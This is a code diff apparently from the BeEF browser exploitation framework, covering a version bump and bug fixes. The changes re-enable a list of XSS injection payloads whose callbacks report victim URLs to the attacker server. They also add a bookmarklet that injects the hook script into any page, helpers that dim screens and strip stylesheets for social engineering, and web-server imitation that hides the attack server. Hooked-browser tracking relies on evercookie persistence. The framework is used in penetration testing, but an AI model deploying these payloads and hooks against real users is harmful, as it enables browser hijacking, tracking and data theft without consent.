Update version to '0.4.4.4.1-alpha' bug fix edition

will be rendered in the admin UI

Gemfile

@@ -9,11 +9,9 @@
 # Gems only required on Windows, or with specific Windows issues
 if RUBY_PLATFORM.downcase.include?("mswin") || RUBY_PLATFORM.downcase.include?("mingw")
   gem "win32console"
-  gem "eventmachine", "1.0.0.beta.4.1"
-else
-  gem "eventmachine", "0.12.10"
 end
 
+gem "eventmachine", "1.0.3"
 gem "thin"
 gem "sinatra", "1.3.2"
 gem "em-websocket", "~> 0.3.6"

Rakefile

@@ -76,10 +76,10 @@ end
 @beef_process_id = nil;
 
 task :beef_start => 'beef' do
-  printf "Starting BeEF (wait 10 seconds)..."
+  printf "Starting BeEF (wait a few seconds)..."
   @beef_process_id = IO.popen("ruby ./beef -x 2> /dev/null", "w+")
-  delays = [2, 2, 1, 1, 1, 0.5, 0.5 , 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05]
-  delays.each do |i| # delay for 10 seconds
+  delays = [3, 2, 2, 2, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
+  delays.each do |i| # delay for a few seconds
     printf '.'
     sleep (i)
   end

VERSION

@@ -4,4 +4,4 @@
 # See the file 'doc/COPYING' for copying permission
 #
 
-0.4.4.3-alpha
+0.4.4.4.1-alpha

config.yaml

@@ -6,7 +6,7 @@
 # BeEF Configuration file
 
 beef:
-    version: '0.4.4.3-alpha'
+    version: '0.4.4.4.1-alpha'
     debug: false
 
     restrictions:
@@ -43,7 +43,7 @@ beef:
 
         # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
         web_server_imitation:
-            enable: false
+            enable: true
             type: "apache" #supported: apache, iis
 
         # Experimental HTTPS support for the hook / admin / all other Thin managed web services
@@ -91,6 +91,10 @@ beef:
 
     crypto_default_value_length: 80
 
+    # Enable client-side debugging
+    client:
+        debug: false
+
     # You may override default extension configuration parameters here
     extension:
         requester:

core/main/client/beef.js

@@ -31,7 +31,21 @@ if(typeof beef === 'undefined' && typeof window.beef === 'undefined') {
 		
 		// An array containing all the BeEF JS components.
 		components: new Array(),
-		
+
+                /**
+                 * Adds a function to display debug messages (wraps console.log())
+                 * @param: {string} the debug string to return
+                 */
+                debug: function(msg) {
+                    if (!<%= @client_debug %>) return;
+                    if (typeof console == "object" && typeof console.log == "function") {
+                        console.log(msg);
+                    } else {
+                        // TODO: maybe add a callback to BeEF server for debugging purposes
+                        //window.alert(msg);
+                    }
+                },
+
 		/**
 		 * Adds a function to execute.
 		 * @param: {Function} the function to execute.

core/main/client/browser.js

@@ -444,12 +444,20 @@ beef.browser = {
         return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 25) ? true : false);
     },
 
+    /**
+     * Returns true if Chrome 26.
+     * @example: beef.browser.isC26()
+     */
+    isC26:function () {
+        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 26) ? true : false);
+    },
+
     /**
      * Returns true if Chrome.
      * @example: beef.browser.isC()
      */
     isC:function () {
-        return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC20() || this.isC21() || this.isC22() || this.isC23() || this.isC24() || this.isC25();
+        return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC20() || this.isC21() || this.isC22() || this.isC23() || this.isC24() || this.isC25() || this.isC26();
     },
 
     /**
@@ -530,6 +538,7 @@ beef.browser = {
             C23:this.isC23(), // Chrome 23
             C24:this.isC24(), // Chrome 24
             C25:this.isC25(), // Chrome 25
+            C26:this.isC26(), // Chrome 26
             C:this.isC(), // Chrome any version
 
             FF2:this.isFF2(), // Firefox 2
@@ -667,7 +676,11 @@ beef.browser = {
         if (this.isC25()) {
             return '25'
         }
-        ;
+        ;    // Chrome 25
+        if (this.isC26()) {
+            return '26'
+        }
+        ;    // Chrome 26
         if (this.isFF2()) {
             return '2'
         }
@@ -858,10 +871,10 @@ beef.browser = {
             try {
                 // append hook script
                 self.frames[i].document.body.appendChild(script);
-                //console.log("Hooked child frame [src:"+self.frames[i].window.location.href+"]");
+                beef.debug("Hooked child frame [src:"+self.frames[i].window.location.href+"]");
             } catch (e) {
                 // warn on cross-domain
-                //console.log("Hooking frame failed");
+                beef.debug("Hooking frame failed");
             }
         }
     },

core/main/client/dom.js

@@ -76,6 +76,30 @@ beef.dom = {
 		
 		return iframe;
 	},
+
+	/**
+	 * Returns the highest current z-index
+	 * @param: {Boolean} whether to return an associative array with the height AND the ID of the element
+	 * @return: {Integer} Highest z-index in the DOM
+	 * OR
+	 * @return: {Hash} A hash with the height and the ID of the highest element in the DOM {'height': INT, 'elem': STRING}
+	 */
+	getHighestZindex: function(include_id) {
+		var highest = {'height':0, 'elem':''};
+		$j('*').each(function() {
+			var current_high = parseInt($j(this).css("zIndex"),10);
+			if (current_high > highest.height) {
+				highest.height = current_high;
+				highest.elem = $j(this).attr('id');
+			}
+		});
+
+		if (include_id) {
+			return highest;
+		} else {
+			return highest.height;
+		}
+	},
 	
 	/**
      * Create and iFrame element. In case it's create with POST method, the iFrame is automatically added to the DOM and submitted.
@@ -95,8 +119,15 @@ beef.dom = {
 			var form_action = params['src'];
 			params['src'] = '';
 		}
-		if (type == 'hidden') { css = $j.extend(true, {'border':'none', 'width':'1px', 'height':'1px', 'display':'none', 'visibility':'hidden'}, styles); }
-		if (type == 'fullscreen') { css = $j.extend(true, {'border':'none', 'background-color':'white', 'width':'100%', 'height':'100%', 'position':'absolute', 'top':'0px', 'left':'0px'}, styles); $j('body').css({'padding':'0px', 'margin':'0px'}); }
+		if (type == 'hidden') {
+			css = $j.extend(true, {'border':'none', 'width':'1px', 'height':'1px', 'display':'none', 'visibility':'hidden'}, styles);
+		} else if (type == 'fullscreen') {
+			css = $j.extend(true, {'border':'none', 'background-color':'white', 'width':'100%', 'height':'100%', 'position':'absolute', 'top':'0px', 'left':'0px', 'z-index':beef.dom.getHighestZindex()+1}, styles);
+			$j('body').css({'padding':'0px', 'margin':'0px'});
+		} else {
+			css = styles;
+			$j('body').css({'padding':'0px', 'margin':'0px'});
+		}
 		var iframe = $j('<iframe />').attr(params).css(css).load(onload).prependTo('body');
 		
 		if (form_submit && form_action)
@@ -127,6 +158,75 @@ beef.dom = {
             }
         });
     },
+
+    /**
+     * Load a full screen div that is black, or, transparent
+     * @param: {Boolean} vis: whether or not you want the screen dimmer enabled or not
+     * @param: {Hash} options: a collection of options to customise how the div is configured, as follows:
+     *         opacity:0-100         // Lower number = less grayout higher = more of a blackout
+     *           // By default this is 70 
+     *         zindex: #             // HTML elements with a higher zindex appear on top of the gray out
+     *           // By default this will use beef.dom.getHighestZindex to always go to the top
+     *         bgcolor: (#xxxxxx)    // Standard RGB Hex color code
+     *           // By default this is #000000
+     */
+	grayOut: function(vis, options) {
+	  // in any order.  Pass only the properties you need to set.
+	  var options = options || {};
+	  var zindex = options.zindex || beef.dom.getHighestZindex()+1;
+	  var opacity = options.opacity || 70;
+	  var opaque = (opacity / 100);
+	  var bgcolor = options.bgcolor || '#000000';
+	  var dark=document.getElementById('darkenScreenObject');
+	  if (!dark) {
+	    // The dark layer doesn't exist, it's never been created.  So we'll
+	    // create it here and apply some basic styles.
+	    // If you are getting errors in IE see: http://support.microsoft.com/default.aspx/kb/927917
+	    var tbody = document.getElementsByTagName("body")[0];
+	    var tnode = document.createElement('div');           // Create the layer.
+	        tnode.style.position='absolute';                 // Position absolutely
+	        tnode.style.top='0px';                           // In the top
+	        tnode.style.left='0px';                          // Left corner of the page
+	        tnode.style.overflow='hidden';                   // Try to avoid making scroll bars            
+	        tnode.style.display='none';                      // Start out Hidden
+	        tnode.id='darkenScreenObject';                   // Name it so we can find it later
+	    tbody.appendChild(tnode);                            // Add it to the web page
+	    dark=document.getElementById('darkenScreenObject');  // Get the object.
+	  }
+	  if (vis) {
+	    // Calculate the page width and height 
+	    if( document.body && ( document.body.scrollWidth || document.body.scrollHeight ) ) {
+	        var pageWidth = document.body.scrollWidth+'px';
+	        var pageHeight = document.body.scrollHeight+'px';
+	    } else if( document.body.offsetWidth ) {
+	      var pageWidth = document.body.offsetWidth+'px';
+	      var pageHeight = document.body.offsetHeight+'px';
+	    } else {
+	       var pageWidth='100%';
+	       var pageHeight='100%';
+	    }
+	    //set the shader to cover the entire page and make it visible.
+	    dark.style.opacity=opaque;
+	    dark.style.MozOpacity=opaque;
+	    dark.style.filter='alpha(opacity='+opacity+')';
+	    dark.style.zIndex=zindex;
+	    dark.style.backgroundColor=bgcolor;
+	    dark.style.width= pageWidth;
+	    dark.style.height= pageHeight;
+	    dark.style.display='block';
+	  } else {
+	     dark.style.display='none';
+	  }
+	},
+
+	/**
+	 * Remove all external and internal stylesheets from the current page - sometimes prior to socially engineering,
+	 *  or, re-writing a document this is useful.
+	 */
+	removeStylesheets: function() {
+		$j('link[rel=stylesheet]').remove();
+		$j('style').remove();
+	},
 	
 	/**
      * Create a form element with the specified parameters, appending it to the DOM if append == true
@@ -292,7 +392,7 @@ beef.dom = {
             }
             content += "</object>";
         }
-        if (beef.browser.isC() || beef.browser.isS() || beef.browser.isO()) {
+        if (beef.browser.isC() || beef.browser.isS() || beef.browser.isO() || beef.browser.isFF()) {
 
             if (codebase != null) {
                 content = "" +
@@ -311,24 +411,25 @@ beef.dom = {
             }
             content += "</applet>";
         }
-        if (beef.browser.isFF()) {
-            if (codebase != null) {
-                content = "" +
-                    "<embed id='" + id + "' code='" + code + "' " +
-                    "type='application/x-java-applet' codebase='" + codebase + "' " +
-                    "height='0' width='0' name='" + name + "'>";
-            } else {
-                content = "" +
-                    "<embed id='" + id + "' code='" + code + "' " +
-                    "type='application/x-java-applet' archive='" + archive + "' " +
-                    "height='0' width='0' name='" + name + "'>";
-            }
-
-            if (params != null) {
-                content += beef.dom.parseAppletParams(params);
-            }
-            content += "</embed>";
-        }
+        // For some reasons JavaPaylod is not working if the applet is attached to the DOM with the embed tag rather than the applet tag.
+//        if (beef.browser.isFF()) {
+//            if (codebase != null) {
+//                content = "" +
+//                    "<embed id='" + id + "' code='" + code + "' " +
+//                    "type='application/x-java-applet' codebase='" + codebase + "' " +
+//                    "height='0' width='0' name='" + name + "'>";
+//            } else {
+//                content = "" +
+//                    "<embed id='" + id + "' code='" + code + "' " +
+//                    "type='application/x-java-applet' archive='" + archive + "' " +
+//                    "height='0' width='0' name='" + name + "'>";
+//            }
+//
+//            if (params != null) {
+//                content += beef.dom.parseAppletParams(params);
+//            }
+//            content += "</embed>";
+//        }
         $j('body').append(content);
     },
 

core/main/client/geolocation.js

@@ -32,14 +32,14 @@ beef.geolocation = {
 
         $j.ajax({
             error: function(xhr, status, error){
-                //console.log("[geolocation.js] openstreetmap error");
+                beef.debug("[geolocation.js] openstreetmap error");
                 beef.net.send(command_url, command_id, "latitude=" + latitude
                              + "&longitude=" + longitude
                              + "&osm=UNAVAILABLE"
                              + "&geoLocEnabled=True");
                 },
             success: function(data, status, xhr){
-                //console.log("[geolocation.js] openstreetmap success");
+                beef.debug("[geolocation.js] openstreetmap success");
                 var jsonResp = $j.parseJSON(data);
 
                 beef.net.send(command_url, command_id, "latitude=" + latitude
@@ -64,16 +64,16 @@ beef.geolocation = {
 	        beef.net.send(command_url, command_id, "latitude=NOT_ENABLED&longitude=NOT_ENABLED&geoLocEnabled=False");	
 			return;
 		}
-        //console.log("[geolocation.js] navigator.geolocation.getCurrentPosition");
+        beef.debug("[geolocation.js] navigator.geolocation.getCurrentPosition");
         navigator.geolocation.getCurrentPosition( //note: this is an async call
 			function(position){ // success
 				var latitude = position.coords.latitude;
         		var longitude = position.coords.longitude;
-                //console.log("[geolocation.js] success getting position. latitude [%d], longitude [%d]", latitude, longitude);
+                beef.debug("[geolocation.js] success getting position. latitude [%d], longitude [%d]", latitude, longitude);
                 beef.geolocation.getOpenStreetMapAddress(command_url, command_id, latitude, longitude);
 
 			}, function(error){ // failure
-                    //console.log("[geolocation.js] error [%d] getting position", error.code);
+                    beef.debug("[geolocation.js] error [%d] getting position", error.code);
 					switch(error.code) // Returns 0-3
 					{
 						case 0:

core/main/client/hardware.js

@@ -126,4 +126,4 @@ beef.hardware = {
 	}
 };
 
-beef.regCmp('beef.net.hardware');
+beef.regCmp('beef.hardware');

core/main/client/init.js

@@ -13,7 +13,8 @@
  * and will have a new session id. The new session id will need to know
  * the brwoser details. So sendback the browser details again.
  */
-BEEFHOOK = beef.session.get_hook_session_id();
+
+beef.session.get_hook_session_id();
 
 if (beef.pageIsLoaded) {
     beef.net.browser_details();
@@ -31,7 +32,7 @@ window.onpopstate = function (event) {
             try {
                 callback(event);
             } catch (e) {
-                console.log("window.onpopstate - couldn't execute callback: " + e.message);
+                beef.debug("window.onpopstate - couldn't execute callback: " + e.message);
             }
             return false;
         }
@@ -46,7 +47,7 @@ window.onclose = function (event) {
             try {
                 callback(event);
             } catch (e) {
-                console.log("window.onclose - couldn't execute callback: " + e.message);
+                beef.debug("window.onclose - couldn't execute callback: " + e.message);
             }
             return false;
         }

core/main/client/net/dns.js

@@ -43,7 +43,7 @@ beef.net.dns = {
 
 		// sends a DNS request
 		sendQuery = function(query) {
-			//console.log("Requesting: "+query);
+			beef.debug("Requesting: "+query);
 			var img = new Image;
 			img.src = "http://"+query;
 			img.onload = function() { dom.removeChild(this); }

core/main/client/net/xssrays.js

@@ -49,22 +49,20 @@ beef.net.xssrays = {
     //browser-specific attack vectors available strings: ALL, FF, IE, S, C, O
     vectors: [
 
-//				  {input:"',XSS,'", name: 'Standard DOM based injection single quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:"\',XSS,\'", name: 'Standard DOM based injection single quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'",XSS,"', name: 'Standard DOM based injection double quote', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:'\'><script>XSS<\/script>', name: 'Standard script injection single quote', browser: 'ALL',url:true,form:true,path:true},
-				  {input:'"><script>XSS<\/script>', name: 'Standard script injection double quote', browser: 'ALL',url:true,form:true,path:true}, //,
-//				  {input:'\'><body onload=\'XSS\'>', name: 'body onload single quote', browser: 'ALL',url:true,form:true,path:true},
-				  {input:'"><body onload="XSS">', name: 'body onload double quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'\'"><script>XSS<\/script>', name: 'Standard script injection', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'\'"><body onload="XSS">', name: 'body onload', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'%27%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'%22%3E%3C%73%63%72%69%70%74%3EXSS%3C%2F%73%63%72%69%70%74%3E', name: 'url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'%25%32%37%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded single quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'%25%32%32%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45XSS%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45', name: 'double url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'%%32%35%%33%32%%33%32%%32%35%%33%33%%34%35%%32%35%%33%33%%34%33%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35XSS%%32%35%%33%33%%34%33%%32%35%%33%32%%34%36%%32%35%%33%37%%33%33%%32%35%%33%36%%33%33%%32%35%%33%37%%33%32%%32%35%%33%36%%33%39%%32%35%%33%37%%33%30%%32%35%%33%37%%33%34%%32%35%%33%33%%34%35', name: 'double nibble url encoded double quote', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true}
-//				  {input:'" type=image src=null onerror=XSS " \' type=image src=null onerror=XSS \'', name: 'Image input overwrite based injection', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:"' onload='XSS' \" onload=\"XSS\"/onload=\"XSS\"/onload='XSS'/", name: 'onload event injection', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true},
-//				  {input:"'},XSS,function x(){//", name: 'DOM based function breaker single quote', browser: 'ALL',url:true,form:true,path:true},
+				  {input:"' style=abc:expression(XSS) ' \" style=abc:expression(XSS) \"", name: 'Expression CSS based injection', browser: 'IE',url:true,form:true,path:true},
+				  {input:'" type=image src=null onerror=XSS " \' type=image src=null onerror=XSS \'', name: 'Image input overwrite based injection', browser: 'ALL',url:true,form:true,path:true},
+				  {input:"' onload='XSS' \" onload=\"XSS\"/onload=\"XSS\"/onload='XSS'/", name: 'onload event injection', browser: 'ALL',url:true,form:true,path:true},
+				  {input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true},
+				  {input:"'},XSS,function x(){//", name: 'DOM based function breaker single quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'"},XSS,function x(){//', name: 'DOM based function breaker double quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3eXSS\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e', name: 'DOM based innerHTML injection', browser: 'ALL',url:true,form:true,path:true},
   				  {input:'javascript:XSS', name: 'Javascript protocol injection', browser: 'ALL',url:true,form:true,path:true},
@@ -107,7 +105,7 @@ beef.net.xssrays = {
     // util function. Print string to the console only if the debug flag is on and the browser is not IE.
     printDebug:function(log) {
         if (this.debug && (!beef.browser.isIE6() && !beef.browser.isIE7() && !beef.browser.isIE8())) {
-            console.log("[XssRays] " + log);
+            beef.debug("[XssRays] " + log);
         }
     },
 
@@ -340,8 +338,8 @@ beef.net.xssrays = {
                         beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.poc = pocurl;
                         beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
 
-                        beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
-                            + "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
+                        beefCallback = "location='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
+                            + "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
 
                         exploit = vector.input.replace(/XSS/g, beefCallback);
 
@@ -368,7 +366,7 @@ beef.net.xssrays = {
                 beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
 
                 beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
-                    + "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
+                    + "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
 
                 exploit = vector.input.replace(/XSS/g, beefCallback);
 
@@ -424,7 +422,7 @@ beef.net.xssrays = {
                         beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
 
                         beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
-                            + "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
+                            + "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
 
                         exploit = beef.net.xssrays.escape(vector.input.replace(/XSS/g, beefCallback));
                         form += '<textarea name="' + i + '">' + exploit + '<\/textarea>';

core/main/client/session.js

@@ -13,7 +13,8 @@ beef.session = {
 	
 	hook_session_id_length: 80,
 	hook_session_id_chars: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",	
-	ec: new evercookie(),	
+	ec: new evercookie(),
+    beefhook: "<%= @hook_session_name %>",
 	
 	/**
 	 * Gets a string which will be used to identify the hooked browser session
@@ -22,12 +23,12 @@ beef.session = {
 	 */
   	get_hook_session_id: function() {
 		// check if the browser is already known to the framework
-		var id = this.ec.evercookie_cookie("BEEFHOOK");
+		var id = this.ec.evercookie_cookie(beef.session.beefhook);
 		if (typeof id == 'undefined') {
-			var id = this.ec.evercookie_userdata("BEEFHOOK");
+			var id = this.ec.evercookie_userdata(beef.session.beefhook);
 		}
 		if (typeof id == 'undefined') {
-			var id = this.ec.evercookie_window("BEEFHOOK");
+			var id = this.ec.evercookie_window(beef.session.beefhook);
 		}
 		
 		// if the browser is not known create a hook session id and set it
@@ -47,9 +48,9 @@ beef.session = {
 	 */
   	set_hook_session_id: function(id) {
 		// persist the hook session id
-		this.ec.evercookie_cookie("BEEFHOOK", id);
-		this.ec.evercookie_userdata("BEEFHOOK", id);
-		this.ec.evercookie_window("BEEFHOOK", id);
+		this.ec.evercookie_cookie(beef.session.beefhook, id);
+		this.ec.evercookie_userdata(beef.session.beefhook, id);
+		this.ec.evercookie_window(beef.session.beefhook, id);
 	},
 	
 	/**

core/main/client/updater.js

@@ -15,6 +15,7 @@ beef.updater = {
 	
 	// XHR-polling timeout.
     xhr_poll_timeout: "<%= @xhr_poll_timeout %>",
+    beefhook: "<%= @hook_session_name %>",
 	
 	// A lock.
 	lock: false,
@@ -57,7 +58,7 @@ beef.updater = {
 	get_commands: function() {
 		try {
 			this.lock = true;
-            beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, 'BEEFHOOK='+beef.session.get_hook_session_id(), 5, 'script', function(response) {
+            beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, beef.updater.beefhook+'='+beef.session.get_hook_session_id(), 5, 'script', function(response) {
                 if (response.body != null && response.body.length > 0)
                     beef.updater.execute_commands();
             });

core/main/handlers/hookedbrowsers.rb

@@ -51,13 +51,18 @@ module Handlers
 
       # @note is a known browser so send instructions 
       else       
+        # @note Check if we haven't seen this browser for a while, log an event if we haven't
+        if (Time.new.to_i - hooked_browser.lastseen.to_i) > 60
+          BeEF::Core::Logger.instance.register('Zombie',"#{hooked_browser.ip} appears to have come back online","#{hooked_browser.id}")
+        end
+
         # @note record the last poll from the browser
         hooked_browser.lastseen = Time.new.to_i
         
         # @note Check for a change in zombie IP and log an event
         if config.get('beef.http.use_x_forward_for') == true
           if hooked_browser.ip != request.env["HTTP_X_FORWARDED_FOR"]
-            BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.env["HTTP_X_FORWARDED_FOR"]}")
+            BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.env["HTTP_X_FORWARDED_FOR"]}","#{hooked_browser.id}")
             hooked_browser.ip = request.env["HTTP_X_FORWARDED_FOR"]
           end
         else

core/main/handlers/modules/beefjs.rb

@@ -80,8 +80,9 @@ module BeEF
             # @note set the XHR-polling timeout
             hook_session_config['xhr_poll_timeout'] = config.get("beef.http.xhr_poll_timeout")
 
-            # @note set the hook file path
+            # @note set the hook file path and BeEF's cookie name
             hook_session_config['hook_file'] = config.get("beef.http.hook_file")
+            hook_session_config['hook_session_name'] = config.get("beef.http.hook_session_name")
 
             # @note if http_port <> public_port in config ini, use the public_port
             unless hook_session_config['beef_public_port'].nil?

core/main/server.rb

@@ -34,16 +34,17 @@ module BeEF
 
       def to_h
         {
-            'beef_version' => VERSION,
-            'beef_url' => @url,
+            'beef_version'  => VERSION,
+            'beef_url'      => @url,
             'beef_root_dir' => @root_dir,
-            'beef_host' => @configuration.get('beef.http.host'),
-            'beef_port' => @configuration.get('beef.http.port'),
-            'beef_public' => @configuration.get('beef.http.public'),
+            'beef_host'     => @configuration.get('beef.http.host'),
+            'beef_port'     => @configuration.get('beef.http.port'),
+            'beef_public'   => @configuration.get('beef.http.public'),
             'beef_public_port' => @configuration.get('beef.http.public_port'),
-            'beef_dns' => @configuration.get('beef.http.dns'),
-            'beef_hook' => @configuration.get('beef.http.hook_file'),
-            'beef_proto' => @configuration.get('beef.http.https.enable') == true ? "https" : "http"
+            'beef_dns'      => @configuration.get('beef.http.dns'),
+            'beef_hook'     => @configuration.get('beef.http.hook_file'),
+            'beef_proto'    => @configuration.get('beef.http.https.enable') == true ? "https" : "http",
+            'client_debug'  => @configuration.get("beef.client.debug")
         }
       end
 

extensions/admin_ui/controllers/panel/index.html

@@ -60,6 +60,8 @@
 <body>
 	<%= nonce_tag %>	
 	<div id="header">
+		<div class="left-menu" id="header-right">
+		</div>
 		<div class="right-menu">
 			<img src="/ui/media/images/favicon.ico" alt="BeEF" title="BeEF" /> 
 			BeEF <%= BeEF::Core::Configuration.instance.get('beef.version') %> | 

extensions/admin_ui/media/css/base.css

@@ -5,13 +5,24 @@
  */
 
 #header .right-menu {
+	width: 300px;
 	float: right;
-	margin: 10px;
+	margin: 3px 3px 0 4px;
 	word-spacing: 5px;
 	font: 11px arial, tahoma, verdana, helvetica;
 	color:#000;
 }
 
+#header .left-menu {
+	width: 300px;
+	float: left;
+	margin: 10px 4px 0 20px;
+	word-spacing: 5px;
+	font: 11px arial, tahoma, verdana, helvetica;
+	font-weight: bolder;
+	color:red;
+}
+
 #header a:link,
 #header a:visited {
 	color:#000;

extensions/admin_ui/media/javascript/ui/panel/PanelViewer.js

@@ -42,19 +42,39 @@ Ext.onReady(function() {
  * This event updater retrieves updates every 8 seconds. Those updates
  * are then pushed to various managers (i.e. the zombie manager).
  */
+var lastpoll = new Date().getTime();
+
 Ext.TaskMgr.start({
 	run: function() {
 		Ext.Ajax.request({
 			url: '/ui/panel/hooked-browser-tree-update.json',
 			method: 'POST',
 			success: function(response) {
-				var updates = Ext.util.JSON.decode(response.responseText);
+				var updates;
+				try {
+					updates = Ext.util.JSON.decode(response.responseText);
+				} catch (e) {
+					//The framework has probably been reset and you're actually logged out
+					var hr = document.getElementById("header-right");
+					hr.innerHTML = "You appear to be logged out. <a href='/ui/panel/'>Login</a>";
+				}
 				var distributed_engine_rules = (updates['ditributed-engine-rules']) ? updates['ditributed-engine-rules'] : null;
 				var hooked_browsers = (updates['hooked-browsers']) ? updates['hooked-browsers'] : null;
 				
 				if(zombiesManager && hooked_browsers) {
 					zombiesManager.updateZombies(hooked_browsers, distributed_engine_rules);
 				}
+				lastpoll = new Date().getTime();
+				var hr = document.getElementById("header-right");
+				hr.innerHTML = "";
+			},
+			failure: function(response) {
+				var timenow = new Date().getTime();
+
+				if ((timenow - lastpoll) > 60000) {
+					var hr = document.getElementById("header-right");
+					hr.innerHTML = "Framework is down";
+				}
 			}
 		});
 	},

extensions/admin_ui/media/javascript/ui/panel/WelcomeTab.js

@@ -6,6 +6,10 @@
 
 WelcomeTab = function() {
 
+    var hookURL = location.protocol+'%2f%2f'+location.hostname+(location.port ? ':'+location.port : '')+'%2fhook.js';
+    var bookmarklet = "javascript:%20(function%20()%20{%20var%20url%20=%20%27__HOOKURL__%27;if%20(typeof%20beef%20==%20%27undefined%27)%20{%20var%20bf%20=%20document.createElement(%27script%27);%20bf.type%20=%20%27text%2fjavascript%27;%20bf.src%20=%20url;%20document.body.appendChild(bf);}})();"
+    bookmarklet = bookmarklet.replace(/__HOOKURL__/,hookURL);
+
     welcome = " \
               <div style='font:11px tahoma,arial,helvetica,sans-serif;width:500px' > \
               <p><img src='/ui/media/images/beef.jpg' alt='BeEF - The Browser Exploitation Framework' /></p><br /> \
@@ -13,6 +17,7 @@ WelcomeTab = function() {
               <p><span style='font:bold 13px tahoma,arial,helvetica,sans-serif'>Getting Started</span></p><br />\
               <p>Welcome to BeEF!</p><br /> \
               <p>Before being able to fully explore the framework you will have to 'hook' a browser. To begin with you can point a browser towards the basic demo page <a href='/demos/basic.html' target='_blank'>here</a>, or the advanced version <a href='/demos/butcher/index.html' target='_blank'>here</a>.</p><br /> \
+              <p>If you want to hook ANY page (for debugging reasons of course), drag the following bookmarklet link into your browser's bookmark bar, then simply click the shortcut on another page: <a href='__BOOKMARKLETURL__'>Hook Me!</a></p><br /> \
               <p>After a browser is hooked into the framework they will appear in the 'Hooked Browsers' panel on the left. Hooked browsers will appear in either an online or offline state, depending on how recently they have polled the framework.</p><br /> \
               <p><span style='font:bold 13px tahoma,arial,helvetica,sans-serif'>Hooked Browsers</span></p><br />\
               <p>To interact with a hooked browser simply left-click it, a new tab will appear. \
@@ -46,7 +51,9 @@ WelcomeTab = function() {
